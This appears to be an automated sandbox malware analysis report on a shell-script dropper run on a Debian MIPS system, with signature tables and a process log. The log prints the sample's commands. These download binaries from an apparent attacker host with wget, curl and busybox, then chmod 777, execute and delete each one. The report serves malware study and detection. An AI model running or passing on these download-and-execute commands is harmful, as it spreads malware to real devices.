Malware Analysis Report

2025-05-06 03:38

Sample ID 241124-bt7wbssrej
Target 844b57641f1b3245860dd2c581f61721.bin
SHA256 4744936aed410f2c0f2415c7e43a23fa5098f31fb71ed1824b2bb0a6441045f1
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

4744936aed410f2c0f2415c7e43a23fa5098f31fb71ed1824b2bb0a6441045f1

Threat Level: Shows suspicious behavior

The file 844b57641f1b3245860dd2c581f61721.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 01:27

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 01:27

Reported

2024-11-24 01:29

Platform

debian9-mipsbe-20240611-en

Max time kernel

103s

Max time network

132s

Command Line

[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 N/A
N/A /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M N/A
N/A /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm N/A
N/A /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an N/A
N/A /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ N/A
N/A /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh N/A
N/A /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC N/A
N/A /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 N/A
N/A /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q N/A
N/A /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB N/A
N/A /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a N/A
N/A /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ N/A
N/A /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo N/A
N/A /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R N/A
N/A /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ N/A
N/A /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh N/A
N/A /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC N/A
N/A /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 N/A
N/A /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q N/A
N/A /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB N/A
N/A /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a N/A
N/A /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ N/A
N/A /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo N/A
N/A /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R N/A
N/A /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 N/A
N/A /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M N/A
N/A /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm N/A
N/A /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /usr/bin/curl N/A
File opened for modification /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /usr/bin/curl N/A
File opened for modification /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /usr/bin/curl N/A
File opened for modification /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /usr/bin/curl N/A
File opened for modification /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /usr/bin/curl N/A
File opened for modification /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an /usr/bin/curl N/A
File opened for modification /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an /usr/bin/curl N/A
File opened for modification /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /usr/bin/curl N/A
File opened for modification /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /usr/bin/curl N/A
File opened for modification /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /usr/bin/curl N/A
File opened for modification /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /usr/bin/curl N/A
File opened for modification /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /usr/bin/curl N/A
File opened for modification /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /usr/bin/curl N/A
File opened for modification /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /usr/bin/curl N/A
File opened for modification /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /usr/bin/curl N/A
File opened for modification /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /usr/bin/curl N/A
File opened for modification /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /usr/bin/curl N/A
File opened for modification /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /usr/bin/curl N/A
File opened for modification /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /usr/bin/curl N/A
File opened for modification /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /usr/bin/curl N/A
File opened for modification /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /usr/bin/curl N/A
File opened for modification /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /usr/bin/curl N/A
File opened for modification /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /usr/bin/curl N/A
File opened for modification /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /usr/bin/curl N/A
File opened for modification /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /usr/bin/curl N/A
File opened for modification /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /usr/bin/curl N/A
File opened for modification /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /usr/bin/curl N/A
File opened for modification /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /usr/bin/curl N/A

Processes

/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh

[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/chmod

[chmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5

[./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/rm

[rm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/chmod

[chmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M

[./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/rm

[rm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/chmod

[chmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm

[./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/rm

[rm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/chmod

[chmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an

[./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/rm

[rm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/chmod

[chmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ

[./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/rm

[rm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/chmod

[chmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh

[./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/rm

[rm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/chmod

[chmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC

[./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/rm

[rm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/chmod

[chmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2

[./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/rm

[rm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/chmod

[chmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q

[./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/rm

[rm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/chmod

[chmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB

[./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/rm

[rm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/chmod

[chmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a

[./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/rm

[rm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/chmod

[chmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ

[./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/rm

[rm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/chmod

[chmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo

[./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/rm

[rm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/chmod

[chmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R

[./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/rm

[rm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/chmod

[chmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ

[./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/rm

[rm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/chmod

[chmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh

[./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/rm

[rm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/chmod

[chmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC

[./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/rm

[rm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/chmod

[chmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2

[./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/rm

[rm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/chmod

[chmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q

[./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/rm

[rm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/chmod

[chmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB

[./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/rm

[rm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/usr/bin/curl

